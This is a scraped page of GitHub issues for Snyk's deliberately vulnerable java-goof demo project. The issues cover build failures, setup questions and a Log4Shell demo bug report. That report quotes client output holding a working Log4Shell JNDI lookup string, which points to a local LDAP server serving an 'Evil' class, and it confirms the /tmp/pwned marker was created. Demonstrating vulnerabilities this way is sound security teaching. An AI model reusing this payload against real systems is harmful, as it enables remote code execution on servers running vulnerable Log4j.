snyk-labs / java-goof Goto Github PK

The README.md is exact copy of the original project. As README says go to todolist-web-springmvc but there is no directory is provided with this name. Do I need to run the original application to exploit the vulnerability?

For K8s demonstrations, I want to have Terraform configs to:

1. provision an EKS cluster
2. restrict the ELB's security group ingress to my home IP address
3. [optional]set route53 DNS to point goof.${my subdomain} to that ELB

docker build of log4shell-server failing maven build with:

#8 11.36 [INFO] ------------------------------------------------------------------------
#8 11.36 [INFO] BUILD FAILURE
#8 11.36 [INFO] ------------------------------------------------------------------------
#8 11.36 [INFO] Total time:  9.492 s
#8 11.36 [INFO] Finished at: 2022-01-21T20:23:07Z
#8 11.36 [INFO] ------------------------------------------------------------------------
#8 11.36 [ERROR] Failed to execute goal org.apache.maven.plugins:maven-assembly-plugin:2.2-beta-5:single (default-cli) on project log4shell-server: Error reading assemblies: No assembly descriptors found. -> [Help 1]
#8 11.36 [ERROR] 
#8 11.36 [ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
#8 11.36 [ERROR] Re-run Maven using the -X switch to enable full debug logging.
#8 11.36 [ERROR] 
#8 11.36 [ERROR] For more information about the errors and possible solutions, please read the following articles:
#8 11.36 [ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException
------

Is there an existing issue for this?

• I have searched the existing issues

Description of the bug

When using 8u191 in directory/project log4shell-goof, I received the following error when running mvn exec:java from client directory (not server):
[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.0.0:java (default-cli) on project log4shell-client: An exception occured while executing the Java class.
[ERROR] Unexpected state.
[ERROR] Make sure to remove /tmp/pwned between runs.
[ERROR] Make sure Server is running.
[ERROR] Make sure you JVM is <= 11.0.1 or 8u191 or 7u201 or 6u211

/tmp/pwned didn't exist, the server was running, and I was using JDK version 8u191. I then downgraded to 8u111. I received the success message:

21:35:34.125 [Main.main()] ERROR Main - test
/tmp/pwned DOES NOT EXIST
21:35:34.128 [Main.main()] ERROR Main - Output:${jndi:ldap://127.0.0.1:9999/Evil}
/tmp/pwned EXISTS - yah been pwned!

Steps To Reproduce

See above

Additional Information

No response

Is there an existing feature request for this?

• I have searched the existing feature requests

Description

Customers pull down goof, java goof etc all the time. Need instructions that point to the java scanning documentation and also potentially give scanning instructions, like in the java-goof, it requires all-projects or --maven-aggregate-project. While the CLI intelligently does give hints, some customers are very novice on the technical level (i.e. pure security or managers) and need the help (sometimes it's a language barrier).

Additional Information

No response